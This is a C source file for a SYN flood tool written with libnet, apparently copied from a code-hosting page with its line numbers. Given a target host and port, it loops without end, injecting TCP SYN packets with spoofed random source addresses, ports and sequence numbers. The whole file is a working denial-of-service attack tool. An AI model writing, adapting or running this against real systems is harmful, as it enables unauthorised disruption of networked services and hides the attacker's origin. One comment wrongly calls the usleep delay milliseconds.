/
synflood.c
86 lines (67 loc) · 2.83 KB
/
synflood.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
#include <libnet.h>
#define FLOOD_DELAY 5000 // delay between packet injects by 5000 ms
/* returns an IP in x.x.x.x notation */
char *print_ip(u_long *ip_addr_ptr) {
return inet_ntoa( *((struct in_addr *)ip_addr_ptr) );
}
int main(int argc, char *argv[]) {
libnet_t *libnet_context;
u_long dest_ip;
u_short dest_port;
u_char errbuf[LIBNET_ERRBUF_SIZE];
int opt, byte_count, packet_size = LIBNET_IPV4_H + LIBNET_TCP_H;
if(argc < 3)
{
printf("Usage:\n%s\t <target host> <target port>\n", argv[0]);
exit(1);
}
libnet_context = libnet_init(LIBNET_RAW4, NULL, errbuf); // Init libnet context
if ( libnet_context == NULL )
{
fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(EXIT_FAILURE);
}
dest_ip = libnet_name2addr4(libnet_context, argv[1], LIBNET_RESOLVE); // the host
dest_port = (u_short) atoi(argv[2]); // the port
libnet_seed_prand(libnet_context); // seed the random number generator
printf("SYN Flooding port %d of %s..\n", dest_port, print_ip(&dest_ip));
while(1) // loop forever (until break by CTRL-C)
{
libnet_build_tcp(libnet_get_prand(LIBNET_PRu16), // source TCP port (random)
dest_port, // destination TCP port
libnet_get_prand(LIBNET_PRu32), // sequence number (randomized)
libnet_get_prand(LIBNET_PRu32), // acknowledgement number (randomized)
TH_SYN, // control flags (SYN flag set only)
libnet_get_prand(LIBNET_PRu16), // window size (randomized)
0, // checksum (0 autofill)
0, // urgent pointer
LIBNET_TCP_H, // tcp packet length
NULL, // payload (none)
0, // payload length
libnet_context, // context
0); // ptag
libnet_build_ipv4(LIBNET_IPV4_H + LIBNET_TCP_H, // size of the packet sans IP header
IPTOS_LOWDELAY, // IP tos
libnet_get_prand(LIBNET_PRu16), // IP ID (randomized)
0, // frag stuff
libnet_get_prand(LIBNET_PR8), // TTL (randomized)
IPPROTO_TCP, // transport protocol
0, // checksum
libnet_get_prand(LIBNET_PRu32), // source IP (randomized)
dest_ip, // destination IP
NULL, // payload (none)
0, // payload length
libnet_context, // libnet context
0); // ptag
byte_count = libnet_write(libnet_context); // inject packet
if ( byte_count != -1 )
printf("%d bytes written.\n", byte_count);
else
fprintf(stderr, "Error writing packet: %s\n",\
libnet_geterror(libnet_context));
libnet_clear_packet(libnet_context); // clear packet
usleep(FLOOD_DELAY); // wait for FLOOD_DELAY milliseconds
}
libnet_destroy(libnet_context); // free packet memory
return 0;
}